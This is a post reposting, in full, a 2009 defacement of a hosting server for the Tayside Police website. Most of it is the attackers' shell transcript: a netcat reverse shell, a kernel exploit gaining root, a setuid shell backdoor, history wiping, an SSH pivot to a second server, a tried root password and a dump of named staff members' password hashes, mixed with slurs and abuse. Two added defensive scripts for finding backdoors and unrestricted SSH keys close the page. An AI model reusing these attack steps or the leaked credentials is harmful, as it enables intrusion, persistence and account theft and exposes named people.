Tayside Cop-puter Cracked, Pwned & Defaced
Tagged as: computer_liberation filth police
Neighbourhoods: paisley scotland tayside
On August 20 2009, Paisley Young Team broke into stallion.cqm.co.uk, a third-party hosting server that carried the Tayside Police website (the transcript shows a cqm.co.uk box with a taysidepolice account and Tayside access logs under /home/agow, not a host on the police network itself). They had a quick look around and found nothing of interest (to them) before defacing the front page and posting the details of how they cracked the system right there. The transcript gives some insight into how the force's public website was hosted and looked after: a kernel built in October 2003 and never updated since, a root console session open since February 2008 and idle for 105 days, a shell running as the web server user that an old local kernel exploit turned into root, world-writable directories in the web tree where the attackers parked a setuid copy of a shell, and a key-based rsyncbackup login that let them open a shell on a second server, cheeta, without a password.
The defacement is archived here and reposted below in full. See also confirmation and comments at The Registry.
--- Repost below this line ---
HACKED BY FUCKING FRANKIE BOYLE

"I'll tell you the tv show i'd love to see.. CSI:Glasgow.
Well we've done some preliminary tests, and it looks like the intruder definitely did a jobby on the carpet"
hacked by the paisley young team, more asbos than yer maw!
greets to: buckfast wine, that dobber pc plum, glasgow celtic, tennents super lager,
bono, the gay coppers that kept walking round my tent at T in the park when i was trying
to do lines of charlie
black power!
!!!!! SPECIAL THANKS TO THE FORCE'S FINEST IAN MCKENZIE FOR HIS AMAZINGLY SEKURE !!!!!
!!!!! AND FUCKING FRUITY PASSWORDS THAT MADE THIS WHOLE FUCKING THING POSSIBLE. !!!!!
***** HOW DO YOU LIKE THESE APPLES LOLOLOLOLOL!!!!!!!!1111one *****
n1gger@lulzbox:~$ nc -l -v -p 33333
listening on [any] 33333 ...
connect to [xx.xxx.xx.x] from stallion.cqm.co.uk [195.206.197.82] 35598
14:14:19 up 46 days, 23:55, 1 user, load average: 0.12, 0.47, 1.08
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root tty1 - 22Feb08 105days 0.05s 0.05s -bash
Linux stallion 2.4.22-1.2115.nptl #1 Wed Oct 29 15:31:21 EST 2003 i686 athlon i386 GNU/Linux
uid=99(nobody) gid=99(nobody) groups=99(nobody)
/
apache: /root/.bashrc: Permission denied
apache-2.05b$ cd /tmp
apache-2.05b$ ls
mr
mysql.sock
ssh-MGY13992
ssh-upZg4483
##################################
###
### NOTE: This is probably the slowest fucking exploit in the history of
### computer hacking (obviously barring lcamtuf's furious assaults
### on common sense with his famed twentieth century CRONTAB exploits).
###
### To be honest we almost just gave up at this point, but instead we watched
### rangers on the telly for a bit and had a fish supper and a can of fucking TENNENTS
### while we waited for the ELITENESS
###
##################################
apache-2.05b$ ./mr
[+] Please wait...HEAVY SYSTEM LOAD!
1114124 of 1114129 [ 99 % ETA 0.0 s ]
[+] overflow done, the moment of truth...
[+] parent unprotected PTE
depopulate SLAB #1
depopulate SLAB #2
depopulate SLAB #3
depopulate SLAB #4
[ JESUS CHRIST SAKE - OUTPUT CUT FOR SOME SEMBLANCE OF BREVITY ]
depopulate SLAB #337
[!] parent check race... SUCCESS, cought SLAB page!
[+] PID 25870 GOT UID 0, enjoy!
id
uid=0(root) gid=0(root) groups=99(nobody)
uname -a
Linux stallion 2.4.22-1.2115.nptl #1 Wed Oct 29 15:31:21 EST 2003 i686 athlon i386 GNU/Linux
##################################
### FINALLY, UID 0
###
### First things first, we have to add some backdoors, root hasn't even logged in for 105 days
### and their kernel is like something out of the Mesozoic era but nonetheless we have standards
###
##################################
pwd
/tmp
cd /websites/dev/files
ls
it_work_request1142348866.pdf
rsh
t2.php
t3.php
mkdir ...
cd ...
pwd
/websites/dev/files/...
mv ../t2.php .
mv ../rsh .
ls
rsh
t2.php
cp /bin/ash .
chmod a+s ash
ls
ash
rsh
t2.php
ls -al
total 116
drwxrwxrwx 2 root root 4096 Aug 19 16:21 .
drwxrwxrwx 3 dev dev 4096 Aug 19 16:21 ..
-rwsr-sr-x 1 root root 98268 Aug 19 16:21 ash
-rw-r--r-- 1 nobody nobody 2094 Jul 18 20:54 rsh
-rw-rw-rw- 1 mysql mysql 31 Aug 19 11:13 t2.php
w
16:22:38 up 47 days, 2:03, 1 user, load average: 0.31, 1.22, 1.53
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root tty1 - 22Feb08 105days 0.05s 0.05s -bash
cd /home
##################################
###
### Ok let's have a look through the ~s and see if they have any highly
### sekret police documents to steal and run riot with down in the fucking GORBALS
###
##################################
ls
agow
backup
cqm
cqmftp
ianmckenzie
iansbremner
james
jay
karim
mark
peterk
praszkowski
rod
stuartswan
cd rod
ls
gd-2.0.33.tar.gz
test
webalizer-2.01-10-linuxelf-x86-bin.tgz
cd ..
cd peterk
ls
cd ../jay
ls
cd ../james
ls
ShowNews.php
tay.tar
vacancies.php
vacancy_details.php
vsftpd-1.1.3-8.i386.rpm
cd ..
cd praszkowski
ls
cd ../agow
ls
accesslogs.02.03.05
accesslogs.tayside.28.02.05
httpd.conf.17.12.2004
httpd.conf.28.02.05
httpd.conf.29.06.04.15.51
httpd.conf.6.1.5
myadmin
ssl.conf
stats.02.03.05
stats.tayside.28.02.05
taysidestatsfix
cd ..
cd cqm
ls
cd ../iansbremner
ls
cd ../ianmckenzie
ls
cd ..
cd karim
ls
cd ../mark
ls
unset HISTFILE
ls
cd /root
ls
anaconda-ks.cfg
install.log
install.log.syslog
mysqlaccess.log
rkhunter-1.3.0
rkhunter-1.3.0.tar.gz
time
vsftpd-1.1.3-8.i386.rpm
cd ..
ls
backups
bin
boot
dev
dump
dvdbackups
etc
home
initrd
lib
lost+found
misc
mnt
opt
proc
root
sbin
tmp
usr
var
websites
cd /home
ls
agow
backup
cqm
cqmftp
ianmckenzie
iansbremner
james
jay
karim
mark
peterk
praszkowski
rod
stuartswan
cat */.ssh/known_hosts
maverick.cqm.co.uk,195.206.197.25 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAtOUovG8uKLa8iGvVqo
XOfwl7cWdLOlEN2eqdtGWDXnju0Icj75ZAdv4cEuMOzfSTqnmyyxEp7frNSt56iydwbe1wkyGbSMRVHhcLhloou9
XcAs82YsGgpHrc9FrTNbhsmVPAYC6C0hWeYShFzjcTeg706aoMBXzb96yPd0Me8+8=
emerald.cqm.co.uk,195.206.197.50 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEApbFCfHwGFIxZDA3va1N
Sa7MUzEzkF7vozUNOnoFmPR7bXaP/Xm//svCZgbRJNM6nwAkLYMBtpf4ObsloEHTpxTbKnRoctXv0ifX1Wng3GYo
W1CJdAGeaMnKg5O9YfrQSS0jTgokm3gmhLLWnI9MDBgzhdB6SJ/mTvvsa2S9b4/0=
gecko.cqm.co.uk,195.206.197.43 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAvFnpufb3zdtNfGHMPndh/
1gyz7h1LofjDrSJN2fr6UCdOLrVEaqzpAbuOOAnwVfKk03C4jDiNSAhxdfQb3JDyTXw2tG9apUZBLoJ2d7jYIuh9
vdnFVNBCqVa2l7PjVfzjpiswv/KmvMHAUYZe6Aw+B3fJRoIKGuueB5qL4HgK5E=
cd cqm
ls
ls -al
total 24
drwx------ 2 cqm cqm 4096 Jun 9 2004 .
drwxr-xr-x 16 root root 4096 Jun 29 2007 ..
-rw------- 1 cqm cqm 4049 Jan 24 2008 .bash_history
-rw-r--r-- 1 cqm cqm 24 Jun 9 2004 .bash_logout
-rw-r--r-- 1 cqm cqm 191 Jun 9 2004 .bash_profile
-rw-r--r-- 1 cqm cqm 124 Jun 9 2004 .bashrc
cd ../mark
ls -al
total 24
drwx------ 2 mark mark 4096 May 26 2004 .
drwxr-xr-x 16 root root 4096 Jun 29 2007 ..
-rw------- 1 mark mark 34 May 28 2004 .bash_history
-rw-r--r-- 1 mark mark 24 May 26 2004 .bash_logout
-rw-r--r-- 1 mark mark 191 May 26 2004 .bash_profile
-rw-r--r-- 1 mark mark 124 May 26 2004 .bashrc
cd ../peterk
ls -al
total 24
drwx------ 2 peterk peterk 4096 Jul 3 2007 .
drwxr-xr-x 16 root root 4096 Jun 29 2007 ..
-rw------- 1 peterk peterk 403 Jan 7 2008 .bash_history
-rw-r--r-- 1 peterk peterk 24 Jun 19 2007 .bash_logout
-rw-r--r-- 1 peterk peterk 191 Jun 19 2007 .bash_profile
-rw-r--r-- 1 peterk peterk 124 Jun 19 2007 .bashrc
cd ../stuartswan
ls -al
total 24
drwx------ 2 stuartswan stuartswan 4096 Feb 18 2007 .
drwxr-xr-x 16 root root 4096 Jun 29 2007 ..
-rw------- 1 stuartswan stuartswan 115 Jun 8 2007 .bash_history
-rw-r--r-- 1 stuartswan stuartswan 24 Feb 13 2007 .bash_logout
-rw-r--r-- 1 stuartswan stuartswan 191 Feb 13 2007 .bash_profile
-rw-r--r-- 1 stuartswan stuartswan 124 Feb 13 2007 .bashrc
cd ../james
ls -al
total 292
drwx------ 3 james james 4096 Sep 6 2005 .
drwxr-xr-x 16 root root 4096 Jun 29 2007 ..
-rw------- 1 james james 2565 Sep 6 2005 .bash_history
-rw-r--r-- 1 james james 24 May 21 2004 .bash_logout
-rw-r--r-- 1 james james 191 May 21 2004 .bash_profile
-rw-r--r-- 1 james james 124 May 21 2004 .bashrc
drwx------ 2 james james 4096 Aug 8 2004 .ssh
-rw------- 1 james james 2116 Sep 5 2005 .viminfo
-rw-r--r-- 1 root root 6314 Jun 7 2004 ShowNews.php
-rw-rw-r-- 1 james james 133120 Sep 6 2005 tay.tar
-rw-r--r-- 1 james james 29590 Jun 7 2004 vacancies.php
-rw-r--r-- 1 james james 2197 May 27 2004 vacancy_details.php
-rw-r--r-- 1 james james 76611 May 27 2004 vsftpd-1.1.3-8.i386.rpm
cd .ssh
ls
known_hosts
cat known_hosts
maverick.cqm.co.uk,195.206.197.25 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAtOUovG8uKLa8iGvVqoXO
fwl7cWdLOlEN2eqdtGWDXnju0Icj75ZAdv4cEuMOzfSTqnmyyxEp7frNSt56iydwbe1wkyGbSMRVHhcLhloou9XcAs
82YsGgpHrc9FrTNbhsmVPAYC6C0hWeYShFzjcTeg706aoMBXzb96yPd0Me8+8=
cd ../jay
bash: line 77: cd: ../jay: No such file or directory
cd ../../jay
ls -al
total 24
drwx------ 2 jay jay 4096 Feb 4 2008 .
drwxr-xr-x 16 root root 4096 Jun 29 2007 ..
-rw------- 1 jay jay 30 Mar 22 2008 .bash_history
-rw-r--r-- 1 jay jay 24 Jun 14 2006 .bash_logout
-rw-r--r-- 1 jay jay 191 Jun 14 2006 .bash_profile
-rw-r--r-- 1 jay jay 124 Jun 14 2006 .bashrc
cd ../karim
ls -al
total 24
drwx------ 2 karim karim 4096 Sep 17 2004 .
drwxr-xr-x 16 root root 4096 Jun 29 2007 ..
-rw------- 1 karim karim 1069 Feb 22 2006 .bash_history
-rw-r--r-- 1 karim karim 24 Sep 16 2004 .bash_logout
-rw-r--r-- 1 karim karim 191 Sep 16 2004 .bash_profile
-rw-r--r-- 1 karim karim 124 Sep 16 2004 .bashrc
cd ..
cd ianmckenzie
ls -al
total 24
drwx------ 2 ianmckenzie ianmckenzie 4096 Jun 30 2007 .
drwxr-xr-x 16 root root 4096 Jun 29 2007 ..
-rw------- 1 ianmckenzie ianmckenzie 10 Jun 30 2007 .bash_history
-rw-r--r-- 1 ianmckenzie ianmckenzie 24 Jun 29 2007 .bash_logout
-rw-r--r-- 1 ianmckenzie ianmckenzie 191 Jun 29 2007 .bash_profile
-rw-r--r-- 1 ianmckenzie ianmckenzie 124 Jun 29 2007 .bashrc
cd ../iansbremner
ls -al
total 24
drwx------ 2 iansbremner iansbremner 4096 Jul 2 2007 .
drwxr-xr-x 16 root root 4096 Jun 29 2007 ..
-rw------- 1 iansbremner iansbremner 559 Oct 24 2008 .bash_history
-rw-r--r-- 1 iansbremner iansbremner 24 Jun 21 2007 .bash_logout
-rw-r--r-- 1 iansbremner iansbremner 191 Jun 21 2007 .bash_profile
-rw-r--r-- 1 iansbremner iansbremner 124 Jun 21 2007 .bashrc
cd ../agow
ls -al
total 212
drwx------ 7 agow agow 4096 Mar 2 2005 .
drwxr-xr-x 16 root root 4096 Jun 29 2007 ..
-rw------- 1 agow agow 517 Mar 27 2006 .bash_history
-rw-r--r-- 1 agow agow 24 Jun 29 2004 .bash_logout
-rw-r--r-- 1 agow agow 191 Jun 29 2004 .bash_profile
-rw-r--r-- 1 agow agow 124 Jun 29 2004 .bashrc
drwxr-xr-x 2 root root 4096 Mar 2 2005 accesslogs.02.03.05
drwxr-xr-x 2 root root 4096 Feb 28 2005 accesslogs.tayside.28.02.05
-rw-r--r-- 1 root root 36699 Dec 17 2004 httpd.conf.17.12.2004
-rw-r--r-- 1 root root 38604 Feb 28 2005 httpd.conf.28.02.05
-rw-r--r-- 1 root root 36485 Jun 29 2004 httpd.conf.29.06.04.15.51
-rw-r--r-- 1 root root 37513 Jan 6 2005 httpd.conf.6.1.5
drwxr-xr-x 7 root root 4096 Jan 13 2005 myadmin
-rw-r--r-- 1 root root 11457 Feb 28 2005 ssl.conf
drwxr-xr-x 3 root root 4096 Mar 2 2005 stats.02.03.05
drwxr-xr-x 3 root root 4096 Feb 28 2005 stats.tayside.28.02.05
-rw-r--r-- 1 root root 522 Feb 28 2005 taysidestatsfix
cd ../rod
ls -al
total 1164
drwx------ 4 rod rod 4096 Dec 17 2004 .
drwxr-xr-x 16 root root 4096 Jun 29 2007 ..
-rw------- 1 rod rod 1625 Feb 20 2008 .bash_history
-rw-r--r-- 1 rod rod 24 May 21 2004 .bash_logout
-rw-r--r-- 1 rod rod 191 May 21 2004 .bash_profile
-rw-r--r-- 1 rod rod 124 May 21 2004 .bashrc
drwx------ 2 rod rod 4096 May 27 2004 .ssh
-rw-rw-r-- 1 rod rod 587617 Dec 17 2004 gd-2.0.33.tar.gz
drwxr-xr-x 7 root root 4096 Jun 21 2004 test
-rw-rw-r-- 1 rod rod 557825 Dec 17 2004 webalizer-2.01-10-linuxelf-x86-bin.tgz
cd .ssh
ls -al
total 12
drwx------ 2 rod rod 4096 May 27 2004 .
drwx------ 4 rod rod 4096 Dec 17 2004 ..
-rw-r--r-- 1 rod rod 482 Dec 17 2004 known_hosts
cat known_hosts
emerald.cqm.co.uk,195.206.197.50 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEApbFCfHwGFIxZDA3va1NS
a7MUzEzkF7vozUNOnoFmPR7bXaP/Xm//svCZgbRJNM6nwAkLYMBtpf4ObsloEHTpxTbKnRoctXv0ifX1Wng3GYoW1
CJdAGeaMnKg5O9YfrQSS0jTgokm3gmhLLWnI9MDBgzhdB6SJ/mTvvsa2S9b4/0=
gecko.cqm.co.uk,195.206.197.43 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAvFnpufb3zdtNfGHMPndh/1
gyz7h1LofjDrSJN2fr6UCdOLrVEaqzpAbuOOAnwVfKk03C4jDiNSAhxdfQb3JDyTXw2tG9apUZBLoJ2d7jYIuh9vd
nFVNBCqVa2l7PjVfzjpiswv/KmvMHAUYZe6Aw+B3fJRoIKGuueB5qL4HgK5E=
cd ..
ls
gd-2.0.33.tar.gz
test
webalizer-2.01-10-linuxelf-x86-bin.tgz
pwd
/home/rod
file test
test: directory
cd test
ls -al
total 138556
drwxr-xr-x 7 root root 4096 Jun 21 2004 .
drwx------ 4 rod rod 4096 Dec 17 2004 ..
drwxr-xr-x 2 root root 4096 May 28 2004 dump
drwxr-xr-x 55 root root 4096 Jun 21 2004 etc
-r-xr-xr-x 1 root root 141705437 Jun 21 2004 stallion.tgz
drwxr-xr-x 3 root root 4096 Jun 21 2004 usr
drwxr-xr-x 3 root root 4096 Jun 21 2004 var
drwxr-xr-x 4 root root 4096 Jun 7 2004 websites
##################################
###
### Typically, the fuzz, along with not having a clue, also don't even have
### any interesting documents. At all. So we did the only possible thing we
### could and opened up a few extra cans of Tennents and put the bagpipe music
### on while we waited for our mother's valiums to kick in and hacked some of
### those boxes from the known_hosts files
###
##################################
python -c "import pty
pty.spawn('/bin/bash')"
No value for $TERM and no -T specified
No value for $TERM and no -T specified
[root@stallion /]# unset HISTFILE
unset HISTFILE
[root@stallion /]# cd /root
cd /root
[root@stallion root]# cat .bash_history | grep ssh
cat .bash_history | grep ssh
ssh -l praszkowski 192.153.153.158
cat /root/.ssh/id_rsa.pub
ssh-keygen -t rsa
cat /root/.ssh/id_rsa.pub
ssh -l rsyncbackup cheeta.cqm.co.uk
[root@stallion root]# ssh -l rsyncbackup cheeta.cqm.co.uk '/bin/sh -i'
ssh -l rsyncbackup cheeta.cqm.co.uk '/bin/sh -i'
sh-3.2$ unset HISTFILE
unset HISTFILE
sh-3.2$ w
w
14:37:20 up 1 day, 17:22, 2 users, load average: 3.68, 3.83, 3.78
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
praszkow pts/0 homer.colloquium Tue21 3:07m 0.07s 0.79s sshd: praszkows
rod pts/1 homer.colloquium Wed11 1:30m 0.21s 0.02s sshd: rod [priv
sh-3.2$ uname -a
uname -a
Linux cheeta.colloquium.co.uk 2.6.18-128.4.1.el5 #1 SMP Tue Aug 4 20:23:34 EDT 2009 i686 athlon i386 GNU/Linux
sh-3.2$ python -c "import pty
python -c "import pty
> pty.spawn('/bin/bash')"
pty.spawn('/bin/bash')"
[rsyncbackup@cheeta ~]$ unset HISTFILE
unset HISTFILE
unset HISTFILE
[rsyncbackup@cheeta ~]$ w
w
w
14:37:59 up 1 day, 17:23, 2 users, load average: 3.69, 3.81, 3.77
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
praszkow pts/0 homer.colloquium Tue21 3:08m 0.07s 0.79s sshd: praszkows
rod pts/1 homer.colloquium Wed11 1:30m 0.21s 0.02s sshd: rod [priv
[rsyncbackup@cheeta ~]$ su
su
su
Password: 1smat00n
1smat00n
su: incorrect password
##################################
###
### Well that was pretty fucking disappointing, but they don't seem to use the same root
### password across all their boxes... too bad. We could have rooted it with any one of
### various fucking kernel 0days but the idea of losing one while rooting these fucks
### was too much to bear.
###
###
### So there's nothing more left to fucking do than drop these fucks' hashes and run...
###
### root:$1$mC3bm0M0$QAHCSVyQN88t7tE9JtNhq/:13770:0:99999:7:::
### rod:$1$d0OZ5zNo$o4Yz0sUeOjhmE6et2eMKO.:12566:0:99999:7:::
### james:$1$akYkxedb$QHklxxxhRzUkpFZdpOd1h1:12559:0:99999:7:::
### mark:$1$W4ELS6n8$qgZVYP3z7d1w5914AOaow.:12564:0:99999:7:::
### taysidepolice:$1$0p8iRAUu$6iOwg0LpUFGk2rdHMoYQr.:12576:0:99999:7:::
### cqm:$1$8p6STqh4$bWr6trzofzxNLWeptW27B/:13549:0:99999:7:::
### cqmftp:$1$hpaREPUO$kwm7gu9AS8FR1LFGl8Zqo.:12664:0:99999:7:::
### agow:$1$bLelOqTt$27fvhTnUoqZXeiQb60Edk/:12607:0:99999:7:::
### karim:$1$nrVT.2S1$XhuzeDLHDVHLJdEvcHSHl/:12678:0:99999:7:::
### stats:$1$m0cxzrqg$/18ish8HacMbB0tsR6iFU1:12769:0:99999:7:::
### mgt:$1$l9Icz4vK$cAchOnW/An79RRJu4fKZZ.:12769:0:99999:7:::
### dev:$1$jCo28Sqg$A/TtN92yHQfUxDngfjsJG.:12769:0:99999:7:::
### taysc:$1$/ryO6yPH$G9lF6RVcQQE4HyJ9.qlQt1:12930:0:99999:7:::
### jay:$1$WP/CLqCQ$iLZuLjgZPtpTKuL8Cyh3v1:13902:0:99999:7:::
### stuartswan:$1$cWqa4Atg$Xsb0sSt2D7fcvIDrGETl8/:13557:0:99999:7:::
### praszkowski:$1$6fsLuTyw$wNJeAocQMOVGtA9URdvpF/:13574:0:99999:7:::
### peterk:$1$NyIUr2OS$D3Ve31iFLgDk8xZpHni6O1:13683:0:99999:7:::
### iansbremner:$1$T7ZAZyqp$ReVeBZf00XQLBZLpZauqi0:13685:0:99999:7:::
### ianmckenzie:$1$J7vayAhB$MVYkOeMU0Gmjftkz/ipED1:13693:0:99999:7:::
###
##################################
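Two checks an administrator could run on a host like stallion, added here as examples; neither is part of the defacement above nor any cqm.co.uk tooling. The first sweeps a web tree for what the transcript shows being planted: a setuid copy of a shell inside a directory named "...", both sitting in world-writable directories under /websites/dev/files. The fixture tree the script builds is constructed to mirror that listing, and the function names, the tags it prints and the --demo flag are this example's own.

```shell
#!/bin/sh
# Added example (not from the original post): sweep a directory tree for the
# three artefacts visible in the stallion transcript.

# hunt_backdoors ROOT: print one tagged line per suspicious path under ROOT.
hunt_backdoors() {
    root=$1
    # 1. setuid/setgid regular files. A web tree should contain none; the
    #    transcript's "cp /bin/ash .; chmod a+s ash" produces exactly one.
    find "$root" -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null |
        sed 's/^/SETUID_OR_SETGID /'
    # 2. directory names made only of dots ("...", "....") or starting with
    #    two dots: invisible to a casual "ls" and a classic place for tools.
    find "$root" -type d -name '..*' 2>/dev/null |
        sed 's/^/DOT_DIR /'
    # 3. world-writable directories: anyone, including the "nobody" user the
    #    web server ran as, can drop files there.
    find "$root" -type d -perm -0002 2>/dev/null |
        sed 's/^/WORLD_WRITABLE_DIR /'
}

# count_findings ROOT: number of findings, convenient for alerting.
count_findings() {
    hunt_backdoors "$1" | wc -l | tr -d ' '
}

# make_fixture: constructed sample tree mirroring /websites/dev/files/... from
# the transcript (world-writable parent and "..." dir, -rwsr-sr-x ash inside).
# Prints the fixture's path; the caller removes it.
make_fixture() {
    t=$(mktemp -d)
    mkdir -p "$t/websites/dev/files/..."
    chmod 0755 "$t/websites" "$t/websites/dev"
    : > "$t/websites/dev/files/t3.php"
    : > "$t/websites/dev/files/.../ash"
    chmod 0755 "$t/websites/dev/files/.../ash"
    chmod u+s,g+s "$t/websites/dev/files/.../ash"
    chmod 0777 "$t/websites/dev/files" "$t/websites/dev/files/..."
    printf '%s\n' "$t"
}

# Stand-alone run: ./sweep.sh --demo builds the fixture and sweeps it.
if [ "${1:-}" = "--demo" ]; then
    d=$(make_fixture)
    hunt_backdoors "$d"
    rm -rf "$d"
fi
```

Run it as hunt_backdoors /websites (or against the whole host with find's -xdev) from a clean boot medium rather than on the live box: an attacker who has root, as here, can just as easily replace find and ls. The -name '..*' pattern catches "..." and its dot-dot variants but not every disguise (a name like " ." with a leading space, for instance), so treat the sweep as a first pass, not a verdict.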
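The pivot from stallion to cheeta worked because the rsyncbackup account accepted root@stallion's key with no forced command, so ssh -l rsyncbackup cheeta.cqm.co.uk '/bin/sh -i' handed out a shell (no pty needed, which is why the python pty.spawn trick follows it). The second added example, again not from the original post, audits an authorized_keys file for keys that lack a command= restriction. The sample file, its key blobs, addresses, comments and the rrsync path are all constructed for the example.

```shell
#!/bin/sh
# Added example (not from the original post): list authorized_keys entries
# that let the key holder run arbitrary commands on the account.

# unrestricted_keys FILE: print "LINENO: entry" for each key without a
# forced command. Options, if present, come before the key-type token.
unrestricted_keys() {
    awk '
        /^[ \t]*(#|$)/ { next }                      # comments and blank lines
        {
            opts = ""
            if (match($0, /(^|[ \t])(ssh-|ecdsa-|sk-)[^ \t]+[ \t]/))
                opts = substr($0, 1, RSTART)         # text before the key type
            # "restrict" or "no-pty" only remove the tty and forwarding; the
            # client can still send "/bin/sh -i". Only command= forces what runs.
            if (opts !~ /command="/)
                print NR ": " $0
        }
    ' "$1"
}

# count_unrestricted FILE: number of such entries.
count_unrestricted() {
    unrestricted_keys "$1" | wc -l | tr -d ' '
}

# make_sample_keys: constructed authorized_keys with a bare key (as the
# rsyncbackup account on cheeta evidently had), a key with restrict only,
# and a properly forced rsync-only key. Prints the file's path.
make_sample_keys() {
    f=$(mktemp)
    cat > "$f" <<'EOF'
# constructed sample for the example, not the real file from cheeta
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABEXAMPLE0NOTAREALKEY= root@stallion
restrict,from="192.0.2.10" ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEXAMPLE1NOTAREALKEY monitor@ops
restrict,from="192.0.2.10",command="/usr/bin/rrsync -ro /backups" ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEXAMPLE2NOTAREALKEY rsyncbackup@stallion
EOF
    printf '%s\n' "$f"
}

# Stand-alone run: ./keyaudit.sh --demo prints the two offending entries.
if [ "${1:-}" = "--demo" ]; then
    f=$(make_sample_keys)
    unrestricted_keys "$f"
    rm -f "$f"
fi
```

The third sample line is the shape a backup key should take: restrict plus a from= source plus a forced command, here the rrsync helper distributed with rsync in read-only mode, so the key can copy files and nothing else. Separately, since the attackers read their next targets straight out of the known_hosts files under /home, setting HashKnownHosts yes in ssh_config stops those files doubling as a map of the network.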